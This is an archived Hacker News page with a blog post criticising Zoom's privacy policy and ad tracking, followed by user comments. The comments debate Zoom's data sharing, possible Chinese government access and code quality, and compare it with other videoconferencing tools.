Hacker News with comments/articles inlined for offline reading

Authors ranked on leaderboard
Last updated: March 28, 2020 13:35
Reload to view new stories



Front Page/ShowHN stories over 4 points from last 7 days
If internet connection drops, you can still read the stories
If there have been any historical discussions of the story, links to all the previous stories on Hacker News will appear just above the comments.

(1483) Zoom needs to clean up its privacy act

1483 points about 23 hours ago by seapunk in 798th position

blogs.harvard.edu | Estimated reading time – 7 minutes | comments | anchor

As quarantined millions gather virtually on conferencing platforms, the best of those, Zoom, is doing very well. Hats off.

But Zoom is also—correctly—taking a lot of heat for its privacy policy, which is creepily chummy with the tracking-based advertising biz (also called adtech). Two days ago, Consumer Reports, the greatest moral conscience in the history of business, published "Zoom Calls Aren't as Private as You May Think. Here's What You Should Know": videos and notes can be used by companies and hosts, and it offers some tips to protect yourself. And there was already lots of bad PR. A few samples:

There's too much to cover here, so I'll narrow my inquiry down to the "Does Zoom sell Personal Data?" section of the privacy policy, which was last updated on March 18. The section runs two paragraphs, and I'll comment on the second one, starting here:

... Zoom does use certain standard advertising tools which require Personal Data...

What they mean by that is adtech. What they're also saying here is that Zoom is in the advertising business, and in the worst end of it: the one that lives off harvested personal data. What makes this extra creepy is that Zoom is in a position to gather plenty of personal data, some of it very intimate (for example with a shrink talking to a patient) without anyone in the conversation knowing about it. (Unless, of course, they see an ad somewhere that looks like it was informed by a private conversation on Zoom.)

A person whose personal data is being shed on Zoom doesn't know that's happening because Zoom doesn't tell them. There's no red light, like the one you see when a session is being recorded. If you were in a browser instead of an app, an extension such as Privacy Badger could tell you there are trackers sniffing your ass. And, if your browser is one that cares about privacy, such as Brave, Firefox or Safari, there's a good chance it would be blocking trackers as well. But in the Zoom app, you can't tell if or how your personal data is being harvested.

(think, for example, Google Ads and Google Analytics).

There's no need to think about those, because both are widely known for compromising personal privacy. (See here. And here. Also Brett Frischmann and Evan Selinger's Re-Engineering Humanity and Shoshana Zuboff's The Age of Surveillance Capitalism.)

We use these tools to help us improve your advertising experience (such as serving advertisements on our behalf across the Internet, serving personalized ads on our website, and providing analytics services).

Nobody goes to Zoom for an "advertising experience," personalized or not. And nobody wants ads aimed at their eyeballs elsewhere on the Net by third parties using personal information leaked out through Zoom.

Sharing Personal Data with the third-party provider while using these tools may fall within the extremely broad definition of the "sale" of Personal Data under certain state laws because those companies might use Personal Data for their own business purposes, as well as Zoom's purposes.

By "certain state laws" I assume they mean California's new CCPA, but they also mean the GDPR. (Elsewhere in the privacy policy is a "Following the instructions of our users" section, addressing the CCPA, that's as wordy and aversive as instructions for a zero-gravity toilet. Also, have you ever seen, anywhere near the user interface for the Zoom app, a place for you to instruct the company regarding your privacy? Didn't think so.)

For example, Google may use this data to improve its advertising services for all companies who use their services.

May? Please. The right word is will. Why wouldn't they?

(It is important to note advertising programs have historically operated in this manner. It is only with the recent developments in data privacy laws that such activities fall within the definition of a "sale").

While advertising has been around since forever, tracking people's eyeballs on the Net so they can be advertised at all over the place has only been in fashion since around 2007, which was when Do Not Track was first floated as a way to fight it. Adtech (tracking-based advertising) began to hockey-stick in 2010 (when The Wall Street Journal launched its excellent and still-missed What They Know series, which I celebrated at the time). As for history, ad blocking became the biggest boycott ever by 2015. And, thanks to adtech, the GDPR went into force in 2018 and the CCPA in 2020. We never would have had either without "advertising programs" that "historically operated in this manner."

By the way, "this manner" is only called advertising. In fact it's a form of direct marketing, which began as junk mail. I explain the difference in Separating Advertising's Wheat and Chaff.

If you opt out of "sale" of your info, your Personal Data that may have been used for these activities will no longer be shared with third parties.

Opt out? Where? How? I just spent a long time logged in to Zoom (https://us04web.zoom.us/), and can't find anything about opting out of the "sale" of your personal info.

Here's the thing: Zoom doesn't need to be in the advertising business, least of all in the part of it that lives like a vampire off the blood of human data. If Zoom needs more money, it should charge more for its services, or give less away for free. Zoom has an extremely valuable service, which it performs very well—better than anybody else, apparently. It also has a platform with lots of apps whose makers have just as absolute an interest in privacy. They should be concerned as well. (Unless, of course, they also want to be in the privacy-violating end of the advertising business.)

Finally, Zoom really has no serious value if it doesn't protect personal privacy. That's why they need to fix this.

What its current privacy policy says is worse than "You don't have any privacy here." It says, "We expose your virtual necks to data vampires who can do what they will with them."

Please fix it, Zoom.

As for Zoom's competitors, there's a great weakness to exploit here.




All Comments: [-] | anchor

conradev(4204) about 18 hours ago [-]

As other people have stated in this thread, everything in Zoom's privacy policy seems to indicate they are sending data to advertisers only as necessary to advertise their own products. They likely:

- Use the Facebook iOS SDK to measure conversions from app install ads

- Send a list of hashed email addresses to Facebook or other advertisers to do ad re-targeting

- Have Google Analytics on their websites to track where people are visiting their website from, i.e. a click on a Google AdWords ad

While these are all not _ideal_ because _yes_, Google and Facebook use this data for their own purposes as well, it's far from _nefarious_. In fact, it's pretty standard fare. Could Zoom go above and beyond and reject these tools? Yes, they could. Does anyone in practice? No.

If Zoom was selling metadata about their calls, leaking contents of their calls, or themselves served ads – then yes, I'd be concerned. But all indications point to them purchasing ads to further the growth of their business.

I think it is perfectly reasonable to seek guarantees around the usage of the above, more sensitive data (contents of video calls, metadata of video calls, etc.) but on the flip side to imply from their privacy policy that they are sending it to Facebook or that they are 'in the advertising business' is jumping the gun a little bit.

chance_state(4342) about 11 hours ago [-]

Gotta love when HN users go out of their way to apologize for disgusting and immoral behavior by tech companies. I'd expect nothing less.

phyzome(10000) about 13 hours ago [-]

If their Privacy Policy doesn't say they won't sell or distribute call metadata or contents, I have to assume they will. If they want to update their Privacy Policy to make that clearer, I would encourage that.

(And hashed email addresses? Might as well just send the email addresses. Hashing is kind of useless there.)
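
The aside about hashing is easy to demonstrate. A minimal sketch of why hashing adds little here, assuming the common normalize-then-SHA-256 scheme ad platforms use for email matching (addresses made up; TypeScript/Node):

    import { createHash } from "crypto";

    // Hash an email the way ad platforms typically expect: trimmed,
    // lowercased, then SHA-256. (The normalization is an assumption here.)
    const hashEmail = (email: string): string =>
      createHash("sha256").update(email.trim().toLowerCase()).digest("hex");

    // A "hashed" list shared with an ad network...
    const sharedHashes = new Set([hashEmail("alice@example.com")]);

    // ...is trivially matched by anyone who already holds candidate emails,
    // which ad networks do. Hashing only hides addresses nobody knows.
    const candidates = ["bob@example.com", "alice@example.com"];
    for (const email of candidates) {
      if (sharedHashes.has(hashEmail(email))) {
        console.log(`${email} is in the shared list`); // alice matches
      }
    }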

zndr(10000) about 16 hours ago [-]

The other thing that's important is that the privacy policy also covers their marketing site. You can see a clear list of tools that Zoom uses on their content management system (CMS), aka Zoom.us, here: https://builtwith.com/zoom.us

uoaei(3677) about 17 hours ago [-]

> standard fare

Aka 'common sense' aka 'anything that will fit within the Overton window'

Not to be confused with 'decent, moral behavior'

fapi1974(3488) about 15 hours ago [-]

This is the most levelheaded comment I've seen in this thread. Not least because I have literally never seen an ad run on either the Zoom website or the app. Moreover, Zoom is one of the most successful SaaS companies in the world because the unit economics of their basic business model (selling premium subscriptions) are literally better than almost any other SaaS company out there: https://tomtunguz.com/benchmarking-zoom-s-s-1-how-7-key-metr...

shaan1(10000) about 18 hours ago [-]

Think twice before using Zoom. They have a lot of engineers in China developing the core technology. You would be foolish to conduct meetings and share sensitive docs over Zoom. The Communist Party is listening to everything.

https://www.cnbc.com/2019/03/26/zoom-key-profit-driver-ahead...

madwhitehatter(10000) about 18 hours ago [-]

Zoom was developed in China

Look at the top of page 21 of their SEC filing: https://www.sec.gov/Archives/edgar/data/1585521/000119312519...

GekkePrutser(10000) about 22 hours ago [-]

Yeah I hate ZOOM sooo much.

First there was the issue with them turning on the camera by default. At least you could turn that off. Then there was the spyware they installed on every Mac without even asking for consent. And now this...

Since the spyware thing I refuse to install their crap on my machine, but one of our suppliers still uses it and the web client is very choppy.. But they'll just have to put up with it. I'm never installing it again.

geoffeg(10000) about 22 hours ago [-]

I also find their UI to be frustrating, especially the chat part of it. I have yet to find a way to make the chat more dense, every message seems to have an excess of white space. Also, at least with the company that I use it with, there's no obvious way to search message history.

chmaynard(178) about 15 hours ago [-]

> First there was the issue with them turning on the camera by default.

FaceTime does this as well, even when I'm making a phone call via Contacts. I hate it.

geoffeg(10000) about 23 hours ago [-]

> As quarantined millions gather virtually on conferencing platforms, the best of those, Zoom, is doing very well.

Why would Zoom care about their privacy issues if they're doing so well off? Seems like that's a good amount of positive reinforcement that their current approach is the right one to them. Maybe they'll lose a few thousand customers because of it, but given what I'm sure was a huge increase in the past few weeks, why would it be something they're concerned about?

chaps(10000) about 23 hours ago [-]

Because it's the right thing to do.

bradly(1482) about 22 hours ago [-]

The reason Zoom is doing so well is part of its vulnerability. There is very little vendor lock-in with virtual conferencing platforms. If something new/better comes out next month, there isn't much a company will give up by switching vendors. There is little to no infrastructure to set up or maintain. This is the same reason Slack's popularity has skyrocketed. Because of the lack of history and the transient nature of the content shared in them, these areas are quick to gain popularity, but also quick to be replaced when a better product emerges.

bryanrasmussen(265) about 23 hours ago [-]

Because the EU is on lockdown, lots of EU citizens are now using Zoom, and all of those users are potential liabilities due to GDPR issues.

api(1134) about 23 hours ago [-]

The unfortunate wisdom in business is 'nobody cares about privacy or security,' and in my experience it's true. Outside a small number of people nobody even asks these questions.

With our own product ZeroTier we get maybe 1-2 questions a year about privacy and so far only a few enterprise customers have even asked about the security of encryption and authentication. 'It's encrypted' is good enough for 99.9% of the market. Encrypted with what? A cereal box cipher? Nobody cares.

What do people care about? In my experience it's ease of use, ease of use, ease of use, ease of use, and ease of use, in no particular order. An app that's a privacy and security dumpster fire but is very easy to set up and use will win hands down over a better-engineered one that requires even one or two more steps to set up.

randomsearch(4327) about 22 hours ago [-]

OTOH if you're making money from your product, why trash it yourself?

luminati(4341) about 15 hours ago [-]

Honest question [not trying to act controversial], especially with all the US-China spat.

Zoom's engineering team is based in China - the product is primarily built out of there. [1]

What guarantee is there that the CCP is not intercepting/backdooring all video communications? Especially in the current situation, where so much sensitive information is being discussed via Zoom?

[1] https://www.cnbc.com/2019/03/26/zoom-key-profit-driver-ahead...

systemvoltage(10000) about 14 hours ago [-]

I've said this time and again only to get downvotes, since there is no proof or substantiation of the CCP surveillance claims. But it is important to keep in mind. There are things that I cannot say due to our employment contract and NDA, but to say the least, we are looking into this matter.

Surveillance prospects, no matter where they originate - the US or China or Country X - need to be discussed and examined. But apparently, saying anything against China on HN is an automatic ban for creating a flame war. We've become too soft. Obviously personal attacks and racism are not tolerable. But I would personally (some may disagree) say that we should criticize bad parts of culture too...that's for another day or a different forum.

Can we just get past the my-country-your-country bullshit on HN and talk about privacy implications, especially from the world's largest surveillance network? It is one thing to be spied upon for advertisement tracking, quite another to be spied upon by a brutal authoritarian government. Fearlessly criticizing the CCP, or the NSA, or Israeli intelligence agencies, or whatever... should be one of the most important things to talk about on a 'Hacker' news forum.

I am gonna fire off some anon emails to WSJ/NYTimes/WaPo/Guardian to create some awareness, and perhaps they can dig further into Chinese influence over Zoom. I am deeply concerned. The entire world has given up video/audio/screen/application privacy in a snap... and the data might be stored in a Tianjin datacenter whose keys, needless to say, are in the hands of the CCP - I guarantee that but cannot provide proof.

Edit: past comments that were downvoted (and flagged): https://news.ycombinator.com/item?id=22657794

https://news.ycombinator.com/item?id=22684767

https://news.ycombinator.com/item?id=22663295

https://news.ycombinator.com/item?id=22705960

kortilla(10000) about 14 hours ago [-]

Not much. In particular, the fact that you sign up for accounts under company emails makes it much easier for them to selectively target based on which users look the juiciest. Even if the backdoor isn't in the public code, it's trivial to put in logic to have clients receive a different update when signed in with an account marked as "VIP" or whatever.
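
A sketch of the selective-targeting risk described above. Everything here (the account shape, the URLs, the idea that updates are keyed per account) is hypothetical, for illustration only:

    // Hypothetical update endpoint: nothing visible to the client proves
    // that every account is served the same build.
    type Account = { email: string; vip: boolean };

    function updateUrlFor(account: Account): string {
      // A malicious or coerced vendor could key the served binary
      // off account metadata like this.
      return account.vip
        ? "https://updates.example.com/client-instrumented.pkg"
        : "https://updates.example.com/client-standard.pkg";
    }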

kccqzy(3192) about 13 hours ago [-]

I really hate to mention this, but this perhaps answers a question of mine about why the quality of Zoom's code is so low.

When I installed Zoom for Mac for the first time, I noticed it took a while to start up and caused beachballing. So I grabbed a sample of the process via Activity Monitor. To my utter horror, the Zoom binary is shelling out by calling system(3) on the fucking main thread.

I just verified this is the case on the latest version of Zoom for Mac. The binary zoom.us.app/Contents/Frameworks/zmLoader.bundle/Contents/MacOS/zmLoader invokes system(3) on three separate occasions in two functions: -[ZPMBSystemHelper disablePTAutoRestoreWindow] and -[ZPMBSystemHelper disableConfAutoRestoreWindow].

And looking at what the string was, it's just a fucking call to defaults(1). Now I'm not a Mac programming expert but I cannot understand why Zoom needs to change its own preference settings this way. This just screams sloppy software engineering quality. I guess this is what you get when you outsource software engineering.

I would not be surprised at all if someone reports vulnerabilities in Zoom, whether deliberate or accidental.
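
The anti-pattern described above is language-independent: a synchronous shell call on the thread that drives the UI stalls everything until the child process exits. A minimal Node/TypeScript analogy (the preference key and domain are illustrative, not Zoom's actual strings):

    import { exec, execSync } from "child_process";

    // What the Zoom binary is effectively doing: a blocking shell call on
    // the main thread. In a GUI app this freezes the UI (beachballing)
    // until the child exits.
    function disableAutoRestoreBlocking(): void {
      execSync("defaults write us.zoom.example AutoRestoreWindow -bool false");
    }

    // Least-effort fix: run it asynchronously so the main thread keeps
    // servicing events. (The real fix on macOS is to skip the shell
    // entirely and call CFPreferences/NSUserDefaults directly.)
    function disableAutoRestoreAsync(): void {
      exec("defaults write us.zoom.example AutoRestoreWindow -bool false", (err) => {
        if (err) console.error("defaults failed:", err);
      });
    }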

tly_alex(10000) about 14 hours ago [-]

Zoom as a legal entity is a US company, headquartered in San Jose, California. So US law should apply.

https://en.wikipedia.org/wiki/Zoom_Video_Communications

eternalny1(3232) about 12 hours ago [-]

Of course the CCP can intercept those videos. Snowden's book talked about how the NSA is doing what they are doing specifically because China was doing it.

It's not specific to Zoom, they intercept at the global fiber lines, they can watch ANY video they want.

So yes, the CCP can watch your videos and so can the NSA.

CoffeeDregs(4217) about 21 hours ago [-]

Title is sort of incorrect: 'Zoom needs to clean up its privacy act' should be 'Zoom needs not to do stupid shit'...

I'm a fan of the product (great Linux support) but this is ridiculous behavior. I have a hard time imagining the product meeting in which 'Yes. That's a good idea. Let's do it.' was said. I get that FB is big, that Zoom wants the credibility, etc., but that's a sign that management is not thinking clearly about their product and should be a red flag to any investor (among the many green flags from current demand)...

thoraway1010(10000) about 19 hours ago [-]

You realize investors are laughing their way to the bank because of Zoom's ease-of-use focus? The investors in the fully encrypted, privacy-based video conferencing platforms (yes, they exist) are broke now.

meritt(10000) about 22 hours ago [-]

It works really well.

One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in. It's drastically reduced people fumbling around with phone numbers + participant codes, ending up in the wrong meeting, or getting stuck in some unnecessary software install loop. If someone is more than two minutes late, they're getting a phone call that brings them instantly into the meeting.

Also a really nice feature, again for phone conferences, is that when people dial in I see their phone number as their handle in the UI. But during the call, as they introduce themselves or I look up their number, I can rename their user to something recognizable. Now if I'm on a call with 5 people at another firm, I appear really impressive because I know who each person is by name. When someone is speaking on the conference call, their icon lights up. If someone has a ton of background noise I can easily mute them.

Zoom Phone (addl paid feature) is awesome too. Virtual phone numbers, IVR, call routing, busy hours, I can instantly turn a 1:1 conversation into a zoom meeting that other people can join, etc. Zoom Phone works on my iphone like a regular dialer, and I can place/receive fully digital calls on it (pretty similar to how Google Voice works), so it doesn't matter if I have actual cell service.

I've never used Microsoft Teams, and it does look really snazzy, but Zoom is an absolute joy to use compared to every single other conferencing software I have ever used. The video chat and screensharing are fast and responsive and just work exactly like you would expect.

andrepd(3744) about 20 hours ago [-]

>One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in.

Jitsi Meet has this feature

jbuscher(10000) about 22 hours ago [-]

Honestly UberConference works way better...

jmacd(2392) about 22 hours ago [-]

I believe Zoom Phone is a whitelabel of RingCentral

hpcjoe(10000) about 22 hours ago [-]

Having used zoom, teams, skype for business, webex, and many others ... zoom is the only one of these which just works. I'm on the con calls typically 5+ hours a day. Yes, it is soul crushing.

Teams sorta works, though it often messes up with devices - headsets and speakers (I've got a Jabra Speak 710). Oftentimes it handles contention badly.

Skype ... yeah. The less said the better.

Webex. Must be marketing for Zoom and others, given how unreservedly horrible the UX is.

I've also used UberConference, some years ago. Almost as good as Zoom.

I am looking at containerized ways to run zoom to restrict its access to my system, but it is the best IMO, by far.

[edit] I should note that I've also used Viber a bit. Less now though. Mostly for calling home from overseas. Not great for conferencing though.

ThePowerOfFuet(10000) about 21 hours ago [-]

>One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in. It's drastically reduced people fumbling around with phone numbers + participant codes, ending up in the wrong meeting, or getting stuck in some unnecessary software install loop. If someone is more than two minutes late, they're getting a phone call that brings them instantly into the meeting.

Why on earth are people needing to make POTS phone calls to join a meeting? Not only is the audio of vastly inferior quality, the information isn't being kept secure AND they can't see anything being presented.

Instead, why not shoot them a link so they can just click it and be in the meeting? That's how it SHOULD work, but that's not how it DOES work with Zoom (unless you engage in tomfoolery to make like you're trying but failing to install the software, and only then do you get a link to join via browser — but then you get a deliberately-crippled experience because fuck you).

Scoundreller(4304) about 22 hours ago [-]

Yep. It just works. First time use is nearly instant.

WebEx always took a while to on-board.

panpanna(10000) about 22 hours ago [-]

> It works really well.

Does it?

Asking because I just left a Zoom meeting with horrible sound quality and extremely bad video quality. Why anyone would prefer that to Teams is beyond me.

Edit: interesting this is _heavily_ downvoted. Can't a person have a bad experience and tell HN about it?

Scoundreller(4304) about 22 hours ago [-]

Zoom Phone has been a game changer.

One of the 2 big cell phone networks we have, Rogers, has been regularly failing to connect calls during peak hours for the past week. Being able to do digital calls has changed a lot, and probably took a load off their network.

(I say 2 big networks because Bell and Telus share tower infrastructure. Dunno where it separates out again, possibly just billing.)

angrygoat(2940) about 21 hours ago [-]

Another pretty great thing with Zoom is that it'll keep a call up even if, say, your home internet drops out and you switch to tethering on your phone. It sounds rare, but with Australian internet or dodgy campus wifi, this is a really useful feature.

Yizahi(10000) about 21 hours ago [-]

Yes, we transitioned from Webex + Lync + Skype + Cisco phones to just Zoom and it is amazing (aside from the privacy breaches, of course). Conferencing is a pain and Zoom solves a lot of existing issues in that area, so companies recognize this, especially when the people in charge also use conference software :) .

dang(182) about 19 hours ago [-]

(This subthread was originally in reply to https://news.ycombinator.com/item?id=22703219)

hanoz(2201) about 18 hours ago [-]

As it's beginning to look like my days as a Zoom refusenik are numbered, what is the safest way to use it? Android, iOS, Chromebook, some form of virtualization or container?

jjgreen(3954) about 18 hours ago [-]

On a disposable laptop on an isolated subnet. Then burn it after use.

bchociej(10000) about 18 hours ago [-]

I run it, along with other sketchy garbage proprietary software for work, in a QEMU VM. Or I just dial in and let people suffer through me being on a phone connection owing to their choice of software.

Tokkemon(10000) about 23 hours ago [-]

Is Zoom the best though? Google Hangouts seems to be just as good.

ltrcola(4330) about 16 hours ago [-]

I like Hangouts overall, but the killer feature that's missing is a good gallery view where I can see more than 4-6 participants at a time. Zoom is really good at this.

primity(10000) about 23 hours ago [-]

I use both at work, and Hangouts has fewer features and struggles more noticeably with bad connections. I consider Hangouts worse.

jacobobryant(4149) about 23 hours ago [-]

For me, zoom consistently has far better A/V quality than hangouts.

So we have two anecdotes now I guess.

thekyle(3181) about 23 hours ago [-]

I tried Google Hangouts on Firefox on Linux but couldn't get it to work at all. It just errored out before starting the call.

RMPR(10000) about 23 hours ago [-]

'Seems'. Some people have reported that Zoom handles more participants gracefully than Hangouts and performs better on a slow connection; see this thread: https://news.ycombinator.com/item?id=15717701 and this one: https://news.ycombinator.com/item?id=16155155

There are probably a couple of others you can find here and there.

Edit: Well, this thread also.

RyanShook(3000) about 23 hours ago [-]

Everyone mentions Jitsi on HN but I'm guessing AV quality isn't as good as Zoom's...

buro9(1991) about 23 hours ago [-]

Try it at 12 people.

Try it when you want to control who is speaking and when.

Try it when you want to co-ordinate hundreds of participants and still want to track who has a question so you can hand the virtual mic / airtime to them.

Try it when you want breakout groups and to determine who is in which group, and after a set time for the groups to return to the main space.

What is good enough for 2 people facing each other, and appears to work perfectly well for a group of 5 or 6... doesn't quite scale to a company all-hands, or giving a lecture or seminar.

Tools fit a scale, and Zoom is excessive for the small and simple use-case but excels at the large and complex.

quaffapint(4206) about 22 hours ago [-]

We just used it at work with 500+ people. After all the various teleconferencing crap we paid $$$ for, we couldn't use them because they couldn't handle it. Zoom worked flawlessly.

holler(10000) about 20 hours ago [-]

My experience with google hangouts over the years has been that it's a poorly made product. It does work 'ok' for 1-1 but the video quality would frequently drop or not connect at all. Zoom just 'works'.

shd4(10000) about 17 hours ago [-]

Zoom needs to fuck off. This is apologism. We need an open-source and decentralized solution and we need to shut up. I'm tired of this.

tomstockmail(10000) about 17 hours ago [-]

I've been using Jitsi Meet

https://jitsi.org/jitsi-meet/

shd4(10000) about 16 hours ago [-]

Oh yea, I know that there are technical difficulties considering the decentralization. But why aren't we working on it now? Dunno what we're waiting for. Mass adoption?

mikestew(4070) about 23 hours ago [-]

I have a need for Zoom, virus or no, but the point of the article is why I don't give them money. Give them money, while the company is apparently still going to worry about milking advertising dollars out of me? That's just going to be a strong 'no'. As the final paragraph of TFA says, either charge more or give away less for free. But if you're selling me out to advertisers after I've given you money, then you're one of 'those' companies that I avoid if at all possible. Because they're skeezy. You don't want to appear skeezy, do you, Zoom?

So for now Skype and MS Teams work fine, or at least fine enough that I don't bother with Zoom. Which brings me to a side question: what is the value proposition for Zoom? What does their product do so much better than the others that I'd put up with this shit? Why am I hearing about it so much lately? Outstanding PR department?

EDIT: thanks for your answers to "why use it, then?" Because "it just works" seems to be the summary, which hoo boy, one cannot say about a lot of the competition.

loudmax(10000) about 21 hours ago [-]

If your concern is privacy, why are you using Skype and MS Teams?

If you don't want a third party getting your contact information, then use a private solution that's actually private. Jitsi and Matrix are open source solutions that both support video conferencing.

pergadad(10000) about 20 hours ago [-]

Alternatives might be Jitsi, and the 8x8 service built on Jitsi tech.

chanmad29(10000) about 22 hours ago [-]

Does anyone know what Facebook could do with such video calling data?

PS- I hate misuse of my data as much as the next person.

chaz(2593) about 21 hours ago [-]

> Give them money, while the company is apparently still going to worry about milking advertising dollars out of me?

Does Zoom have ads? I haven't seen any. I believe all of the ad tracking is for the reverse: Zoom wants to see if their own advertising is effective. For example, if they buy an ad on Facebook that you saw and then you install the app, they can attribute the install to that ad and measure ROI.

impendia(4023) about 22 hours ago [-]

> What does their product do so much better than the others that I'd put up with this shit?

I'll share my perspective as an academic. Many of us have adopted Zoom, practically overnight, for our teaching, for one-on-one meetings with students, and even for conferences [1].

The answer is: It just works. It's easy. It does what we want it to, with a minimum of fuss.

As someone who now has a whole bunch of unanticipated shit to deal with, this is one less thing to worry about.

I definitely share your objection in principle. If this situation continues long into the future (a terrifying thought), then perhaps I'll revisit my choice of software. But in the short term, to be honest, I don't much care.

[1] https://www.daniellitt.com/agonize/

wenc(4314) about 22 hours ago [-]

I've used Skype (for business and normal Skype), FaceTime etc. The Zoom experience is just much better for larger groups (> 10).

I use Teams at work and would say it is comparable to Zoom in terms of AV quality (Microsoft owns both the Skype and Teams portfolios, but Teams is built on a modern codebase that runs on different, markedly superior infra than Skype's). Unfortunately Teams only works in the enterprise (O365), and it is still fairly new, so it doesn't have a lot of the collab functionality like whiteboarding and breakout rooms that Zoom has.

Privacy issues aside, Zoom really is a better product. People are more forgiving of a product's peccadillos when it just works.

tmpz22(4343) about 17 hours ago [-]

I said this at the beginning of the crisis and first major rush to Zoom by many companies: their start-up friendly business model is going to bite them hard when they have to blitzscale services and there will be growing pains while they find the right non-vc-subsidized pricing model for long-term customers.

I think we can cut them some slack for now as they are under more pressure than many other tech companies. They managed to make a great product - so presumably they'll be able to build the right processes for the company itself soon too.

gowld(10000) about 19 hours ago [-]

I don't get it. I get that if you don't like the adalytics-based business model, you don't use the product. But I don't see a rational basis for making that conditional on cash price, which is an independent concern. It only makes sense if you value the product at somewhere between the cash price and (the cash price - the adalytics cost), and $0 cost is exceedingly unlikely to be the exact boundary.

It only makes sense if you make the unsupported leap in logic that says the cash price is itself a promise not to use analytics. But you are willing to accept $0 adalytics-supported products, and FOSS exists and some has adalytics and some doesn't, showing that $0 is not any kind of meaningful boundary.

flattone(10000) about 22 hours ago [-]

Nothing works well enough to be worth forfeiting our self-respect.

matheusmoreira(10000) about 11 hours ago [-]

> the company is apparently still going to worry about milking advertising dollars out of me

They will never not do that. Paying customer or not, no business is ever going to say 'let's give up a huge amount of revenue so we can avoid invading people's privacy and annoying them with ads they don't want to see'. To do so would be to miss an opportunity to make even more money.

The fact you're a paying customer also implies you have disposable income and you're willing to spend it. Ironically, paying money to avoid advertising makes your attention even more valuable to advertisers.

The only way they'll stop advertising is if it's not profitable. The only solution is to block all ads and reduce their return on investment as much as possible.

michaelbrooks(4280) about 22 hours ago [-]

Have you taken a look at [0]WhereBy? It's been recommended as a great alternative to Zoom.

[0]https://whereby.com/

imagiko(3967) about 17 hours ago [-]

I just Ctrl+F'd 'Google Meet' and no one seems to be really talking about it. We've been using it for our meetings for a long time and it works really well. I'm wondering why it doesn't have widespread adoption. You can call in via phone, log the minutes of the meeting, and it seems to 'just work' too.

gregkerzhner(3914) about 15 hours ago [-]

I am also confused about why Zoom is the de facto conference tool now. I have been working remotely for 6 years and haven't really noticed it being significantly better than other tools like Lifesize or Bluejeans. Also, the inability to draw on the presenter's screen is a big negative in my opinion. Trying to pair lately over Zoom always ends in a bunch of stammering like 'erase that dot over there.. no... over there... no, up left...'

TheKarateKid(10000) about 9 hours ago [-]

> But if you're selling me out to advertisers after I've given you money, then you're one of 'those' companies that I avoid if at all possible.

Sadly, this happens everywhere. Verizon and ATT? Selling your location and data usage patterns for years.

Bank accounts and credit cards? Selling your purchase patterns for decades.

floatingatoll(4062) about 22 hours ago [-]

Compared to the other ten or twenty videoconferencing solutions, it's the only one that has worked reliably and without accessibility issues for technical and non-technical people in my life. The automatic video and audio processing features make it so that a day-one user has as good an experience as a year-two user, and I haven't had to answer any technical support questions about it to my family.

FaceTime is the only serious competitor I can think of that's able to deliver as quality of a call experience in a 1:1 setting with non-technical participants, but it's inaccessible on Windows/Android for starters, and lacks the presentation chops to be used in a business setting.

binarymax(2322) about 23 hours ago [-]

To answer your last question - it works very well. I've used lots of virtual meeting software over the past 20 years, and zoom is by far the best.

I agree with your sentiment though - it makes me angry that they're selling my personal data. But sadly I don't think that any companies will voluntarily be non-skeezy...we really need laws and regulations in this space. I don't trust capitalism to take care of my privacy. If companies can get more money without breaking the law, they will absolutely do so.

epanchin(10000) about 22 hours ago [-]

Not much different to Microsoft. Buy Windows, still get tracking and ads. I use it because it's convenient.

Hard to justify moving from zoom to ms teams when Microsoft have shown they don't care about privacy either.

bt3(10000) about 23 hours ago [-]

My take: Zoom is very approachable outside of enterprise. Skype (although it historically has its roots with regular folks) is mostly used in a 'Skype for Business' config. MS Teams is much the same way.

Good PR helps too, I suppose.

gray_-_wolf(10000) about 20 hours ago [-]

> Because "it just works" seems to be the summary

I am using it in chromium on linux, and I can tell you it does not just work. The audio is really really shit (constant crackling). I'm basically unable to attend meetings on zoom. Luckily most of them are in google meet which works fine in a browser.

bchociej(10000) about 18 hours ago [-]

I'm with you. I have no idea what people like about it that isn't already done better in e.g. Google Meet. Having to download a program is also really crappy IMO. Plenty of other video chat applications work in my browser.

u801e(10000) about 19 hours ago [-]

> So for now Skype and MS Teams works fine, or at least fine enough that I don't bother with Zoom. Which brings me to a side question: what is the value proposition for Zoom? What does their product do so much better than the others that I'd put up with this shit?

For me, it's one of the few video chat clients that works well in Linux. Skype may or may not work depending on the version and whether or not Microsoft supports the Linux client. And I have no idea whether MS teams works at all in Linux.

collyw(4322) about 21 hours ago [-]

Having used a few of these lately, it seems to have the best quality of call.

Skype is terrible some days. Google Hangouts is OK. Cisco Webex is dead in the water every time I have tried to use it.

Maybe I just haven't used Zoom enough as the other two do have good days and bad days.

memco(10000) about 22 hours ago [-]

So many replies here have identified the value of Zoom: it is easy to use and has reasonably good quality. So the questions I have: can we add to this? Are there ways to use Zoom more privately?

Personally I haven't seen many people offer up alternatives that are clear winners. They all have tradeoffs. Since there are tradeoffs, I have a hard time moving people in some other direction. If I could say, 'Oh Zoom is nice, but Schmooz is the best!' I know people who'd make the move. Even if it's paid.

Gene_Parmesan(10000) about 22 hours ago [-]

I think you're hearing a lot about it because (a) everyone is quarantined and wants to use the tools they use at work to help set up book club meetings, table-top RPG sessions (did this last night and it actually worked great), etc., (b) it's perhaps easier to use than some others, (c) there's likely a huge PR push right now, and (d) I believe its pricing is better for non-enterprise use than others'.

My company's virtual meeting solutions are a mess; it's the one really messy area in our tooling. For the longest time we had GoTo, but then the dev team specifically also had hipchat for Slack-like interactions. Then hipchat went away, and for some reason the org took that as a cue to do an org-wide rollout of MS Teams, with no approval for us to use Slack. Somewhere along the way certain people somehow acquired Zoom licenses and started using those. Then just about two weeks ago the whole org was told to switch to Zoom, but now not enough people have licenses and all the old GoTo licenses are kaput.

Anyways, the reason I have heard various people from the business side give for why they like Zoom is 'GoTo was too hard to use.' I don't really see that, and I also wonder if there's some sort of 'FOMO' going on. A couple big vendors we interact with use Zoom, Zoom is big in the news currently -- 'everybody uses Zoom!' I do also think it's maybe a bit cheaper at enterprise scale.

I don't mind Zoom from a UX/call quality perspective. I think Alt-A to unmute is super unintuitive but that's a very minor quibble, and for all I know shortcuts are customizable. I am, however, very discouraged by Zoom's privacy story as we're discussing here.

---

